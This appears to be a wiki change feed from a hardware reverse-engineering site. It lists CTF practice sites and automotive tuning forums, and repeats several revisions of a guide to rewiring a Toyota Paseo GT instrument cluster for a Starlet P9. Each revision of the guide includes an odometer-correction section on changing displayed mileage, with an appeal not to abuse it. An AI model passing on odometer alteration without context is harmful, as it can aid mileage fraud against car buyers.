Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Toyota Paseo GT 1.5 odometer Starlet P9 mod

2026-01-01T20:25:54Z

Polymorphic7: mv

Automotive

2025-12-31T14:39:51Z

Polymorphic7: add cluster

[[File:Jeep Fuses.jpg|thumb|Fuse box in a Jeep Wrangler]]
Everything related to reverse engineering automobiles, motorcycles or anything similar.
==Device Index==

===On Vehicle Targets===
[[Yamaha EBike Battery Dongle]] - A way to use Homemade and Third party batteries on a E-Bike that requires communication to be able to turn on.

[[Zadi E-Lock system]] - Motorcycle Key, lock and immobilizer system.

===Aftermarket Parts or Accessories===
[[Parking_Pilot]]

[[Starcom Helios]] - GPS/GSM vehicle tracking device (fleet management)

[https://www.bobadams5.com/posts/yadadashcam/ Yada 720P Roadcam Dashcam]

===Cluster Swap / Modification===
[https://wiki.recessim.com/view/Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod Cluster Wiring Mod Toyota Paseo L17 GT in P9 Starlet]

==Automotive Communication Interfaces==
Automotive electronics often communicate with protocols that are not common to other industries. Examples of automotive communication protocols include [[CAN]], [[LIN]], [[SENT]], and [[Ethernet]]

===ECU Tuning, Repair & Reverse engineering communities / forums===

*[https://carmasters.org/ CarMasters] - is a Russian‑language online forum dedicated to diagnosing, repairing, and discussing auto electronics and electromechanics across a wide range of car brand.
*[http://carcd.ru/forum/ CarCD] - is a Russian-language online community focused on automotive diagnostics, ECU tuning, repair tools, software sharing, and technical discussions for car electronics and chip tuning enthusiasts.
*[https://www.digital-kaos.co.uk/forums/ Digital Kaos] – is a broad tech forum with a strong auto diagnostics and ECU programming section.
*[https://garageforum.org/ GarageForum] - is an English-language forum focused on automotive software, diagnostics, workshop manuals, hardware tools, and technical support for car electronics and tuning.
*[https://mhhauto.com/ MHH Auto] - is a membership‑based community for sharing and discussing automotive software, ECU/airbag/dash activation keys, workshop manuals, tuning tools, and technical resources for educational and experimental car electronics projects.

Toyota Paseo GT 1.5 odometer Starlet P9 mod

2025-12-31T14:32:31Z

Polymorphic7: fix

= Modification Overview =
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play "oem-clean" for the '''Toyota P9''' (EP91 4E-FE 1996-1999). 
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster. After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market.

There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''

[[File:Clusters.png|frameless|380×300px|thumb|left]]

__TOC__

== Toyota Starlet P9 Instrument Cluster Pinout ==
Cluster details: P30, with Tachometer by DENSO.
Part numbers: 83800-10060 and 157370-5241.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low battery warning light → diode
|-
| 2 || Connected || Low battery warning light
|-
| 3 || Connected || Parking brake warning light
|-
| 4 || NC || —
|-
| 5 || NC || —
|-
| 6 || Connected || IG− (Tachometer)
|-
| 7 || NC || —
|-
| 8 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 9 || Connected || IG+ (Tachometer)
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || SRS airbag warning light
|-
| 13 || Connected || SRS airbag warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Fog light indicator
|-
| 2 || Connected || High beam indicator
|-
| 3 || Connected || High beam indicator
|-
| 4 || Connected || Left turn signal indicator
|-
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)
|-
| 6 || NC || —
|-
| 7 || NC || —
|-
| 8 || Connected || Lower 4P terminal (next to speedometer)
|-
| 9 || NC || —
|-
| 10 || Connected || Right turn signal indicator
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || ABS warning light
|-
| 3 || Connected || Check engine light
|-
| 4 || NC || —
|-
| 5 || Connected || E terminal – temperature gauge
|-
| 6 || Connected || T terminal – temperature gauge
|-
| 7 || NC || —
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || F terminal – fuel gauge
|-
| 13 || NC || —
|-
| 14 || Connected || Gauge backlight lamps
|-
| 15 || Connected || Gauge backlight lamps
|-
| 16 || NC || —
|}

== Paseo GT 1.5 Instrument Cluster Pinout ==
Cluster details: L17, with Tachometer by JECO.
Part numbers: 83800-16080 and 82208-001.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || IG+ (Tachometer)
|-
| 2 || Connected || Low battery warning light → diode
|-
| 3 || Connected || Low battery warning light
|-
| 4 || NC || —
|-
| 5 || Connected || Parking brake warning light
|-
| 6 || Connected || Parking brake warning light
|-
| 7 || Connected || Airbag warning light
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || Connected || P (Tachometer)
|-
| 11 || Connected || Airbag warning light
|-
| 12 || Connected || Open door warning light
|-
| 13 || Connected || Open door warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || High beam indicator
|-
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)
|-
| 3 || Connected || Left turn signal indicator
|-
| 4 || Connected || FU terminal – fuel gauge
|-
| 5 || Connected || Fog light indicator
|-
| 6 || Connected || Lower 4P terminal (next to speedometer)
|-
| 7 || Connected || Upper E terminal (next to speedometer)
|-
| 8 || Connected || Right turn signal indicator
|-
| 9 || NC || —
|-
| 10 || Connected || Master warning light
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || TU terminal – temperature gauge
|-
| 3 || Connected || ABS warning light
|-
| 4 || Connected || Check engine light (MIL)
|-
| 5 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 6 || NC || —
|-
| 7 || Connected || Gauge backlight lamps
|-
| 8 || Connected || TE terminal – temperature gauge
|-
| 9 || Connected || Gauge backlight lamps
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || NC || —
|-
| 13 || NC || —
|-
| 14 || NC || —
|-
| 15 || NC || —
|-
| 16 || NC || —
|}

== Instrument Cluster Wiring Modification ==
These are the modifications needed to be made on the GT cluster.
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.

=== Cutting Traces ===

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 10 || CUT
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT (cut close at FU terminal, leave room to solder)
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 10 || CUT
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT
|-
| 5 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 9 || CUT
|}

=== Rewiring Traces ===
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 2''' went to
|-
| 2 || Must now connect to what '''PIN 3''' went to
|-
| 3 || Must now connect to what '''PIN 5''' went to
|-
| 5 || NC / OPEN
|-
| 6 || Must now connect to what '''PIN 10''' went to
|-
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light
|-
| 9 || Must now connect to what '''PIN 1''' went to
|-
| 10 || NC / OPEN
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)
|-
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)
|-
| 3 || Must now connect to the top of the high beam indicator light, here we disconnected two traces.
|-
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)
|-
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)
|-
| 6 || NC / OPEN
|-
| 7 || NC / OPEN
|-
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown)
|-
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)
|-
| Jumper || Place a jumper from FE terminal (fuel gauge) to cut trace were '''PIN 2''' went to (top lamp ground)
|}
<gallery widths=302 heights=182>
File:Cut_double_trace_high_beam.PNG|Important disconnect two high beam indicator light traces on the top. Just jump the rest of the trace accordingly.
</gallery>

<gallery widths=302 heights=182>
File:Cluster mods.jpg|A picture of all the mods that have been applied.
</gallery>

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)
|-
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)
|-
| 4 || NC / OPEN
|-
| 5 || Must now connect to what '''PIN 8''' went to
|-
| 7 || NC / OPEN
|-
| 8 || NC / OPEN
|-
| 9 || NC / OPEN
|-
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal
|-
| 14 || Must now connect to what '''PIN 7''' went to
|-
| 15 || Must now connect to what '''PIN 9''' went to
|}

== ODO Correction ==
If you want to correct yours to avoid getting in trouble by road inspection service. You will have to change it back to your old ODO meter milage. 
Please do not abuse this trick.. I have set mine from around 110.000 to 300.000. Just so I don't get in trouble. 
In the image below you can see how I did it.
<gallery widths=302 heights=182>
File:Odo correction.jpg
</gallery>

== Notes on the Modification ==
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.
They must all be left OPEN FLOATING ('''important''').

= Night time backlight =
[[File:Nighttime running.png|frameless|380×300px|thumb|left]]

Toyota Paseo GT 1.5 odometer Starlet P9 mod

2025-12-31T14:30:14Z

Polymorphic7: edits

= Modification Overview =
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play "oem-clean" for the '''Toyota P9''' (EP91 4E-FE 1996-1999). 
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster. After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market.

There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''

[[File:Clusters.png|frameless|380×300px|thumb|left]]

__TOC__

== Toyota Starlet P9 Instrument Cluster Pinout ==
Cluster details: P30, with Tachometer by DENSO.
Part numbers: 83800-10060 and 157370-5241.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low battery warning light → diode
|-
| 2 || Connected || Low battery warning light
|-
| 3 || Connected || Parking brake warning light
|-
| 4 || NC || —
|-
| 5 || NC || —
|-
| 6 || Connected || IG− (Tachometer)
|-
| 7 || NC || —
|-
| 8 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 9 || Connected || IG+ (Tachometer)
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || SRS airbag warning light
|-
| 13 || Connected || SRS airbag warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Fog light indicator
|-
| 2 || Connected || High beam indicator
|-
| 3 || Connected || High beam indicator
|-
| 4 || Connected || Left turn signal indicator
|-
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)
|-
| 6 || NC || —
|-
| 7 || NC || —
|-
| 8 || Connected || Lower 4P terminal (next to speedometer)
|-
| 9 || NC || —
|-
| 10 || Connected || Right turn signal indicator
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || ABS warning light
|-
| 3 || Connected || Check engine light (MIL)
|-
| 4 || NC || —
|-
| 5 || Connected || E terminal – temperature gauge
|-
| 6 || Connected || T terminal – temperature gauge
|-
| 7 || NC || —
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || F terminal – fuel gauge
|-
| 13 || NC || —
|-
| 14 || Connected || Gauge backlight lamps
|-
| 15 || Connected || Gauge backlight lamps
|-
| 16 || NC || —
|}

== Paseo GT 1.5 Instrument Cluster Pinout ==
Cluster details: L17, with Tachometer by JECO.
Part numbers: 83800-16080 and 82208-001.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || IG+ (Tachometer)
|-
| 2 || Connected || Low battery warning light → diode
|-
| 3 || Connected || Low battery warning light
|-
| 4 || NC || —
|-
| 5 || Connected || Parking brake warning light
|-
| 6 || Connected || Parking brake warning light
|-
| 7 || Connected || Airbag warning light
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || Connected || P (Tachometer)
|-
| 11 || Connected || Airbag warning light
|-
| 12 || Connected || Open door warning light
|-
| 13 || Connected || Open door warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || High beam indicator
|-
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)
|-
| 3 || Connected || Left turn signal indicator
|-
| 4 || Connected || FU terminal – fuel gauge
|-
| 5 || Connected || Fog light indicator
|-
| 6 || Connected || Lower 4P terminal (next to speedometer)
|-
| 7 || Connected || Upper E terminal (next to speedometer)
|-
| 8 || Connected || Right turn signal indicator
|-
| 9 || NC || —
|-
| 10 || Connected || Master warning light
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || TU terminal – temperature gauge
|-
| 3 || Connected || ABS warning light
|-
| 4 || Connected || Check engine light (MIL)
|-
| 5 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 6 || NC || —
|-
| 7 || Connected || Gauge backlight lamps
|-
| 8 || Connected || TE terminal – temperature gauge
|-
| 9 || Connected || Gauge backlight lamps
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || NC || —
|-
| 13 || NC || —
|-
| 14 || NC || —
|-
| 15 || NC || —
|-
| 16 || NC || —
|}

== Instrument Cluster Wiring Modification ==
These are the modifications needed to be made on the GT cluster.
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.

=== Cutting Traces ===

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 10 || CUT
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT (cut close at FU terminal, leave room to solder)
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 10 || CUT
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT
|-
| 5 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 9 || CUT
|}

=== Rewiring Traces ===
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 2''' went to
|-
| 2 || Must now connect to what '''PIN 3''' went to
|-
| 3 || Must now connect to what '''PIN 5''' went to
|-
| 5 || NC / OPEN
|-
| 6 || Must now connect to what '''PIN 10''' went to
|-
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light
|-
| 9 || Must now connect to what '''PIN 1''' went to
|-
| 10 || NC / OPEN
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)
|-
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)
|-
| 3 || Must now connect to the top of the high beam indicator light, here we disconnected two traces.
|-
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)
|-
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)
|-
| 6 || NC / OPEN
|-
| 7 || NC / OPEN
|-
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown)
|-
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)
|-
| Jumper || Place a jumper from FE terminal (fuel gauge) to cut trace were '''PIN 2''' went to (top lamp ground)
|}
<gallery widths=302 heights=182>
File:Cut_double_trace_high_beam.PNG|Important disconnect two high beam indicator light traces on the top. Just jump the rest of the trace accordingly.
</gallery>

<gallery widths=302 heights=182>
File:Cluster mods.jpg|A picture of all the mods that have been applied.
</gallery>

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)
|-
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)
|-
| 4 || NC / OPEN
|-
| 5 || Must now connect to what '''PIN 8''' went to
|-
| 7 || NC / OPEN
|-
| 8 || NC / OPEN
|-
| 9 || NC / OPEN
|-
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal
|-
| 14 || Must now connect to what '''PIN 7''' went to
|-
| 15 || Must now connect to what '''PIN 9''' went to
|}

== ODO Correction ==
If you want to correct yours to avoid getting in trouble by road inspection service. You will have to change it back to your old ODO meter milage. 
Please do not abuse this trick.. I have set mine from around 110.000 to 300.000. Just so I don't get in trouble. 
In the image below you can see how I did it.
<gallery widths=302 heights=182>
File:Odo correction.jpg
</gallery>

== Notes on the Modification ==
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.
They must all be left OPEN FLOATING ('''important''').

= Night time backlight =
[[File:Nighttime running.png|frameless|380×300px|thumb|left]]

File:Nighttime running.png

2025-12-31T14:27:09Z

Polymorphic7:

File:Cluster mods.jpg

2025-12-31T14:24:13Z

Polymorphic7:

File:Clusters.png

2025-12-31T14:15:00Z

Polymorphic7:

Toyota Paseo GT 1.5 odometer Starlet P9 mod

2025-12-31T14:10:49Z

Polymorphic7: few fixes

WIP.

= Modification Overview =
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play "oem-clean" for the '''Toyota P9''' (EP91 4E-FE 1996-1999). 
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster. After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market.

There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''

__TOC__

== Toyota Starlet P9 Instrument Cluster Pinout ==
Cluster details: P30, with Tachometer by DENSO.
Part numbers: 83800-10060 and 157370-5241.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low battery warning light → diode
|-
| 2 || Connected || Low battery warning light
|-
| 3 || Connected || Parking brake warning light
|-
| 4 || NC || —
|-
| 5 || NC || —
|-
| 6 || Connected || IG− (Tachometer)
|-
| 7 || NC || —
|-
| 8 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 9 || Connected || IG+ (Tachometer)
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || SRS airbag warning light
|-
| 13 || Connected || SRS airbag warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Fog light indicator
|-
| 2 || Connected || High beam indicator
|-
| 3 || Connected || High beam indicator
|-
| 4 || Connected || Left turn signal indicator
|-
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)
|-
| 6 || NC || —
|-
| 7 || NC || —
|-
| 8 || Connected || Lower 4P terminal (next to speedometer)
|-
| 9 || NC || —
|-
| 10 || Connected || Right turn signal indicator
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || ABS warning light
|-
| 3 || Connected || Check engine light (MIL)
|-
| 4 || NC || —
|-
| 5 || Connected || E terminal – temperature gauge
|-
| 6 || Connected || T terminal – temperature gauge
|-
| 7 || NC || —
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || F terminal – fuel gauge
|-
| 13 || NC || —
|-
| 14 || Connected || Gauge backlight lamps
|-
| 15 || Connected || Gauge backlight lamps
|-
| 16 || NC || —
|}

== Paseo GT 1.5 Instrument Cluster Pinout ==
Cluster details: L17, with Tachometer by JECO.
Part numbers: 83800-16080 and 82208-001.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || IG+ (Tachometer)
|-
| 2 || Connected || Low battery warning light → diode
|-
| 3 || Connected || Low battery warning light
|-
| 4 || NC || —
|-
| 5 || Connected || Parking brake warning light
|-
| 6 || Connected || Parking brake warning light
|-
| 7 || Connected || Airbag warning light
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || Connected || P (Tachometer)
|-
| 11 || Connected || Airbag warning light
|-
| 12 || Connected || Open door warning light
|-
| 13 || Connected || Open door warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || High beam indicator
|-
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)
|-
| 3 || Connected || Left turn signal indicator
|-
| 4 || Connected || FU terminal – fuel gauge
|-
| 5 || Connected || Fog light indicator
|-
| 6 || Connected || Lower 4P terminal (next to speedometer)
|-
| 7 || Connected || Upper E terminal (next to speedometer)
|-
| 8 || Connected || Right turn signal indicator
|-
| 9 || NC || —
|-
| 10 || Connected || Master warning light
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || TU terminal – temperature gauge
|-
| 3 || Connected || ABS warning light
|-
| 4 || Connected || Check engine light (MIL)
|-
| 5 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 6 || NC || —
|-
| 7 || Connected || Gauge backlight lamps
|-
| 8 || Connected || TE terminal – temperature gauge
|-
| 9 || Connected || Gauge backlight lamps
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || NC || —
|-
| 13 || NC || —
|-
| 14 || NC || —
|-
| 15 || NC || —
|-
| 16 || NC || —
|}

== Instrument Cluster Wiring Modification ==
These are the modifications needed to be made on the GT cluster.
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.

=== Cutting Traces ===

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 10 || CUT
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT (cut close at FU terminal, leave room to solder)
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 10 || CUT
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT
|-
| 5 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 9 || CUT
|}

=== Rewiring Traces ===
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 2''' went to
|-
| 2 || Must now connect to what '''PIN 3''' went to
|-
| 3 || Must now connect to what '''PIN 5''' went to
|-
| 5 || NC / OPEN
|-
| 6 || Must now connect to what '''PIN 10''' went to
|-
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light
|-
| 9 || Must now connect to what '''PIN 1''' went to
|-
| 10 || NC / OPEN
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)
|-
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)
|-
| 3 || Must now connect to the top of the high beam indicator light, here we disconnected two traces.
|-
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)
|-
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)
|-
| 6 || NC / OPEN
|-
| 7 || NC / OPEN
|-
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown)
|-
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)
|-
| Jumper || Place a jumper from FE terminal (fuel gauge) to cut trace were '''PIN 2''' went to (top lamp ground)
|}
<gallery widths=302 heights=182>
File:Cut_double_trace_high_beam.PNG|Important disconnect two high beam indicator light traces on the top. Just jump the rest of the trace accordingly.
</gallery>

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)
|-
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)
|-
| 4 || NC / OPEN
|-
| 5 || Must now connect to what '''PIN 8''' went to
|-
| 7 || NC / OPEN
|-
| 8 || NC / OPEN
|-
| 9 || NC / OPEN
|-
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal
|-
| 14 || Must now connect to what '''PIN 7''' went to
|-
| 15 || Must now connect to what '''PIN 9''' went to
|}

== ODO Correction ==
If you want to correct yours to avoid getting in trouble by road inspection service. You will have to change it back to your old ODO meter milage. 
Please do not abuse this trick.. I have set mine from around 110.000 to 300.000. Just so I don't get in trouble. 
In the image below you can see how I did it.
<gallery widths=302 heights=182>
File:Odo correction.jpg
</gallery>

== Notes on the Modification ==
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.
They must all be left OPEN FLOATING ('''important''').

File:Cut double trace high beam.PNG

2025-12-31T14:10:35Z

Polymorphic7: Polymorphic7 uploaded a new version of File:Cut double trace high beam.PNG

File:Odo correction.jpg

2025-12-31T14:02:00Z

Polymorphic7:

File:Cut double trace high beam.PNG

2025-12-31T13:54:31Z

Polymorphic7:

